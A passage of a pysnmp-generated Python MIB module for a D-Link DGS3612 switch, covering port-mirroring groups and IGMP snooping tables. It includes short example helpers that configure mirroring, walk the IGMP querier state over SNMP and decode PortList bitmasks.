if mibBuilder.loadTexts: swL2MirrorPortState.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorPortState.setDescription('This object indicates the port mirroring state. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. disabled(2) - writing this value to the object removes the corresponding entry from the table. enabled(3) - this entry resides in the table.')
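
# --- Illustrative usage sketch (not part of the generated MIB definitions) ---
# A hedged example of enabling port mirroring: target port 5 sniffs the
# ingress traffic of ports 1 and 2, then the state is set to enabled(3).
# The address, community, and port choices are hypothetical; a PortList
# value is an OctetString bitmask in which the most significant bit of the
# first octet is port 1.
def _example_enable_port_mirroring():
    from pysnmp.hlapi import (setCmd, SnmpEngine, CommunityData,
                              UdpTransportTarget, ContextData, ObjectType,
                              ObjectIdentity, Integer32, OctetString)
    errorIndication, errorStatus, errorIndex, varBinds = next(setCmd(
        SnmpEngine(),
        CommunityData('private'),                  # hypothetical write community
        UdpTransportTarget(('192.0.2.1', 161)),    # hypothetical switch address
        ContextData(),
        ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB', 'swL2MirrorLogicTargetPort', 0),
                   Integer32(5)),
        ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB', 'swL2MirrorPortSourceIngress', 0),
                   OctetString(hexValue='c0000000')),  # bits set for ports 1 and 2
        ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB', 'swL2MirrorPortState', 0),
                   Integer32(3))))                     # 3 = enabled
    if errorIndication or errorStatus:
        print(errorIndication or errorStatus.prettyPrint())
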
swL2MirrorGroupTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5), )
if mibBuilder.loadTexts: swL2MirrorGroupTable.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupTable.setDescription('This table specifies information about the Mirror group configuration.')
swL2MirrorGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2MirrorGroupID"))
if mibBuilder.loadTexts: swL2MirrorGroupEntry.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupEntry.setDescription('A list of information about each Mirror group configuration.')
swL2MirrorGroupID = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 1), Integer32())
if mibBuilder.loadTexts: swL2MirrorGroupID.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupID.setDescription('This object indicates the mirror group. The range of this object is (1..n); the value of n is project-dependent.')
swL2MirrorGroupRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 2), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupRowStatus.setDescription('This object manages this mirror group entry.')
swL2MirrorGroupState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupState.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupState.setDescription('This object indicates the mirror group state.')
swL2MirrorGroupLogicTargetPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupLogicTargetPort.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupLogicTargetPort.setDescription('This object indicates the mirror group target port.')
swL2MirrorGroupPortSourceIngress = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 5), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceIngress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceIngress.setDescription('This object indicates the mirror group ingress source ports.')
swL2MirrorGroupPortSourceEngress = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 10, 5, 1, 6), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceEngress.setStatus('current')
if mibBuilder.loadTexts: swL2MirrorGroupPortSourceEngress.setDescription('This object indicates the mirror group egress source ports.')
swL2IGMPMaxSupportedVlans = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMaxSupportedVlans.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMaxSupportedVlans.setDescription('Maximum number of VLANs in the layer 2 IGMP control table (swL2IGMPCtrlTable).')
swL2IGMPMaxIpGroupNumPerVlan = MibScalar((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMaxIpGroupNumPerVlan.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMaxIpGroupNumPerVlan.setDescription('Maximum number of multicast IP groups per VLAN in the layer 2 IGMP information table (swL2IGMPQueryInfoTable).')
swL2IGMPCtrlTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3), )
if mibBuilder.loadTexts: swL2IGMPCtrlTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlTable.setDescription("The table controls the VLAN's IGMP function. Its scale depends on the current VLAN state (swL2VlanInfoStatus). If VLAN is in disabled mode, there is only one entry in the table, with index 1. If VLAN is in Port-Based or 802.1q mode, the number of entries can be up to 12, with an index range from 1 to 12.")
swL2IGMPCtrlEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPCtrlVid"))
if mibBuilder.loadTexts: swL2IGMPCtrlEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlEntry.setDescription('The entry in IGMP control table (swL2IGMPCtrlTable). The entry is effective only when IGMP capture switch (swL2DevCtrlIGMPSnooping) is enabled.')
swL2IGMPCtrlVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPCtrlVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlVid.setDescription("This object indicates the IGMP control entry's VLAN id. If VLAN is disabled, the Vid is always 0 and cannot be changed by management users. If VLAN is in Port-Based mode, the Vid is fixed, ranging from 1 to 12. If VLAN is in 802.1q mode, the Vid can be set from 1 to 4094 by the management user, and the Vid in each entry must be unique in the IGMP Control Table.")
swL2IGMPQueryInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(125)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPQueryInterval.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryInterval.setDescription('The frequency at which IGMP Host-Query packets are transmitted on this switch.')
swL2IGMPMaxResponseTime = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 25)).clone(10)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMaxResponseTime.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMaxResponseTime.setDescription('The maximum query response time on this switch.')
swL2IGMPRobustness = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 255)).clone(2)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRobustness.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRobustness.setDescription('The Robustness Variable allows tuning for the expected packet loss on a subnet. If a subnet is expected to be lossy, the Robustness Variable may be increased. IGMP is robust to (Robustness Variable-1) packet losses.')
swL2IGMPLastMemberQueryInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 25)).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPLastMemberQueryInterval.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPLastMemberQueryInterval.setDescription('The Last Member Query Interval is the Max Response Time inserted into Group-Specific Queries sent in response to Leave Group messages, and is also the amount of time between Group-Specific Query messages.')
swL2IGMPHostTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16711450)).clone(260)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPHostTimeout.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPHostTimeout.setDescription('The timer value for sending an IGMP query packet when none was sent by the host in the LAN. The timer works on a per-VLAN basis. The device will send the query message when the timer expires. Please refer to RFC 2236 (1997).')
swL2IGMPRouteTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16711450)).clone(260)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRouteTimeout.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouteTimeout.setDescription('The Router Timeout is how long a host must wait after hearing a Query before it may send any IGMPv2 messages.')
swL2IGMPLeaveTimer = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16711450)).clone(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPLeaveTimer.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPLeaveTimer.setDescription('When a querier receives a Leave Group message for a group that has group members on the reception interface, it sends Group-Specific Queries every swL2IGMPLeaveTimer to the group being left.')
swL2IGMPQueryState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPQueryState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryState.setDescription('This object decides whether the IGMP query function is enabled or disabled.')
swL2IGMPCurrentState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("querier", 2), ("non-querier", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPCurrentState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCurrentState.setDescription('This object indicates the current IGMP query state.')
swL2IGMPCtrlState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disable", 2), ("enable", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPCtrlState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPCtrlState.setDescription('This object indicates the status of this entry. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. disable(2) - the IGMP function is disabled for this entry. enable(3) - the IGMP function is enabled for this entry.')
swL2IGMPFastLeaveState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 12), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disable", 2), ("enable", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPFastLeaveState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPFastLeaveState.setDescription('This object indicates the fast-leave status of this entry. other(1) - this entry is currently in use but the conditions under which it will remain so are different from each of the following values. disable(2) - the IGMP fast-leave function is disabled for this entry. enable(3) - the IGMP fast-leave function is enabled for this entry.')
swL2IGMPQueryVersion = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 13), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 3))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPQueryVersion.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryVersion.setDescription('Configure the IGMP version of query packet which will be sent by the router.')
swL2IGMPReportSuppression = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 3, 1, 15), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPReportSuppression.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPReportSuppression.setDescription('When enabled, multiple IGMP reports or leaves for a specific group (S,G) will be integrated into only one report before being sent to the router port.')
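
# --- Illustrative usage sketch (not part of the generated MIB definitions) ---
# A minimal, hedged walk over the IGMP control table that lists each VLAN's
# current querier role (querier/non-querier) from swL2IGMPCurrentState. The
# connection parameters are the same hypothetical placeholders used above.
def _example_walk_igmp_querier_state():
    from pysnmp.hlapi import (nextCmd, SnmpEngine, CommunityData,
                              UdpTransportTarget, ContextData,
                              ObjectType, ObjectIdentity)
    for (errorIndication, errorStatus, errorIndex, varBinds) in nextCmd(
            SnmpEngine(),
            CommunityData('public'),                 # hypothetical community
            UdpTransportTarget(('192.0.2.1', 161)),  # hypothetical switch address
            ContextData(),
            ObjectType(ObjectIdentity('DGS3612-L2MGMT-MIB', 'swL2IGMPCurrentState')),
            lexicographicMode=False):                # stop at the end of the column
        if errorIndication or errorStatus:
            print(errorIndication or errorStatus.prettyPrint())
            break
        for varBind in varBinds:
            print(' = '.join(x.prettyPrint() for x in varBind))
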
swL2IGMPQueryInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4), )
if mibBuilder.loadTexts: swL2IGMPQueryInfoTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryInfoTable.setDescription('The table contains the number of IGMP query packets captured by this device, as well as the number of IGMP query packets sent by the device.')
swL2IGMPQueryInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPInfoVid"))
if mibBuilder.loadTexts: swL2IGMPQueryInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPQueryInfoEntry.setDescription('Information about the current IGMP query state, provided that swL2DevCtrlIGMPSnooping and the swL2IGMPCtrlState of the associated VLAN entry are both enabled.')
swL2IGMPInfoVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPInfoVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoVid.setDescription('This object indicates the Vid of associated IGMP info table entry. It follows swL2IGMPCtrlVid in the associated entry of IGMP control table (swL2IGMPCtrlTable).')
swL2IGMPInfoQueryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPInfoQueryCount.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoQueryCount.setDescription('This object indicates the number of query packets received since the IGMP function was enabled, on a per-VLAN basis.')
swL2IGMPInfoTxQueryCount = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 4, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPInfoTxQueryCount.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoTxQueryCount.setDescription('This object indicates the send count of IGMP query messages, on a per-VLAN basis. In case of IGMP timer expiration, the switch sends IGMP query packets to the related VLAN member ports and increments this object by 1.')
swL2IGMPInfoTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5), )
if mibBuilder.loadTexts: swL2IGMPInfoTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoTable.setDescription('The table containing the current IGMP information captured by this device, provided that swL2DevCtrlIGMPSnooping and the swL2IGMPCtrlState of the associated VLAN entry are both enabled. Note that the priority of IGMP table entries is lower than the Filtering Table, i.e. if there is a table hash collision between the entries of the IGMP Table and the Filtering Table inside the switch H/W address table, then the Filtering Table entry overwrites the colliding entry of the IGMP Table. See the swL2FilterMgmt description as well.')
swL2IGMPInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPVid"), (0, "DGS3612-L2MGMT-MIB", "swL2IGMPGroupIpAddr"))
if mibBuilder.loadTexts: swL2IGMPInfoEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPInfoEntry.setDescription('Information about the current IGMP information captured by this device, provided that swL2DevCtrlIGMPSnooping and the swL2IGMPCtrlState of the associated VLAN entry are both enabled.')
swL2IGMPVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPVid.setDescription('This object indicates the Vid of the individual IGMP table entry. It shows the Vid of the IGMP report information captured on the network.')
swL2IGMPGroupIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPGroupIpAddr.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPGroupIpAddr.setDescription('This object identifies the group IP address captured from the IGMP packet, on a per-VLAN basis.')
swL2IGMPMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 3), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMacAddr.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMacAddr.setDescription('This object identifies the MAC address corresponding to swL2IGMPGroupIpAddr, on a per-VLAN basis.')
swL2IGMPPortMap = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 4), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPPortMap.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPPortMap.setDescription("This object indicates which ports belong to the same multicast group, on a per-VLAN basis. Each multicast group has an octet string to indicate its port map. The most significant bit represents the lowest numbered port, and the least significant bit represents the highest numbered port. Thus, each port of the switch is represented by a single bit within the value of this object. If that bit has a value of '1' then that port is included in the set of ports; the port is not included if its bit has a value of '0'. (Note that the setting of the bit corresponding to the port from which a frame is received is irrelevant.) Each group of 4 octets represents one unit's ports according to its logical port numbering. If the unit has fewer than 32 ports, the remaining bits are ignored and filled with zeros.")
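
# --- Illustrative helper (not part of the generated MIB definitions) ---
# A small sketch of how the PortList bitmask described above can be decoded:
# the most significant bit of the first octet is port 1, and each subsequent
# bit is the next port number.
def _example_decode_portlist(portlist_octets):
    """Return the list of port numbers whose bits are set in a PortList."""
    ports = []
    for octet_index, octet in enumerate(bytearray(portlist_octets)):
        for bit_index in range(8):                     # MSB first
            if octet & (0x80 >> bit_index):
                ports.append(octet_index * 8 + bit_index + 1)
    return ports

# e.g. _example_decode_portlist(b'\xc0\x00\x00\x01') -> [1, 2, 32]
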
swL2IGMPIpGroupReportCount = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 5, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPIpGroupReportCount.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPIpGroupReportCount.setDescription('This object indicates how many report packets corresponding to this entry have been received by the device since the IGMP function was enabled, on a per-VLAN basis.')
swL2IGMPRouterPortsTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6), )
if mibBuilder.loadTexts: swL2IGMPRouterPortsTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterPortsTable.setDescription("The table controls the VLAN's IGMP router ports function.")
swL2IGMPRouterPortsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPRouterPortsVid"))
if mibBuilder.loadTexts: swL2IGMPRouterPortsEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterPortsEntry.setDescription('The entry in IGMP router ports table (swL2IGMPRouterPortsTable).')
swL2IGMPRouterPortsVid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPRouterPortsVid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterPortsVid.setDescription("This object indicates the IGMP router ports entry's VLAN id. If VLAN is disabled, the Vid is always 0 and cannot be changed by management users. If VLAN is in Port-Based mode, the Vid is fixed, ranging from 1 to 12. If VLAN is in 802.1q mode, the Vid can be set from 1 to 4094 by the management user, and the Vid in each entry must be unique in the IGMP ports Table.")
swL2IGMPRouterStaticPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 2), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRouterStaticPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterStaticPortList.setDescription('The static router port list of the VLAN.')
swL2IGMPRouterDynamicPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 3), PortList()).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPRouterDynamicPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterDynamicPortList.setDescription('The dynamically learned router port list of the VLAN.')
swL2IGMPRouterForbiddenPortList = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 6, 1, 4), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPRouterForbiddenPortList.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPRouterForbiddenPortList.setDescription('The forbidden router port list of the VLAN.')
swL2IGMPMulticastVlanTable = MibTable((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7), )
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTable.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanTable.setDescription('The information of the IGMP snooping multicast VLAN table.')
swL2IGMPMulticastVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1), ).setIndexNames((0, "DGS3612-L2MGMT-MIB", "swL2IGMPMulticastVlanid"))
if mibBuilder.loadTexts: swL2IGMPMulticastVlanEntry.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanEntry.setDescription('The entry of swL2IGMPMulticastVlanTable.')
swL2IGMPMulticastVlanid = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(2, 4094))).setMaxAccess("readonly")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanid.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanid.setDescription('This object indicates the VLAN ID of the IGMP snooping multicast VLAN entry.')
swL2IGMPMulticastVlanName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanName.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanName.setDescription('This object indicates the VLAN name of the IGMP snooping multicast VLAN entry.')
swL2IGMPMulticastVlanSourcePort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 3), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanSourcePort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanSourcePort.setDescription('This object indicates the port list of the source ports of the IGMP snooping multicast VLAN. The source ports will be set as tagged ports of the VLAN entry, and the IGMP control messages received from the member ports will be forwarded to the source ports.')
swL2IGMPMulticastVlanMemberPort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 4), PortList()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanMemberPort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanMemberPort.setDescription('This object indicates the port list of the member ports of the IGMP snooping multicast VLAN. The member ports will be set as untagged ports of the VLAN entry, and the IGMP control messages received from the member ports will be forwarded to the source ports.')
swL2IGMPMulticastVlanReplaceSourceIP = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 5), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplaceSourceIP.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanReplaceSourceIP.setDescription('The replacement source IP address of this multicast VLAN.')
swL2IGMPMulticastVlanRangeName = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 6), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeName.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeName.setDescription('The name of multicast address range. When read, it shows NULL.')
swL2IGMPMulticastVlanRangeState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("none", 1), ("add", 2), ("delete", 3), ("deleteAll", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRangeState.setDescription('This object is used to add or delete the specified multicast address range. When read, it shows none(1). When set to add(2) or delete(3), swL2IGMPMulticastVlanRangeName must not be NULL. When set to deleteAll(4), all multicast address ranges on this VLAN are deleted.')
swL2IGMPMulticastVlanState = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("disabled", 2), ("enabled", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanState.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanState.setDescription('This object enables or disables the IGMP snooping multicast VLAN.')
swL2IGMPMulticastVlanRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 9), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRowStatus.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRowStatus.setDescription('This object indicates the status of this entry.')
swL2IGMPMulticastVlanUntagSourcePort = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 10), PortList()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanUntagSourcePort.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanUntagSourcePort.setDescription('This object indicates the untagged member ports to add to the multicast VLAN.')
swL2IGMPMulticastVlanRemapPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 171, 11, 70, 10, 2, 11, 7, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 8)).clone(8)).setMaxAccess("readcreate")
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRemapPriority.setStatus('current')
if mibBuilder.loadTexts: swL2IGMPMulticastVlanRemapPriority.setDescription("The priority value (0 to 7) to be associated with the data traffic to be forwarded on the multicast VLAN. When set to 8, the packet's original priority will be used.")
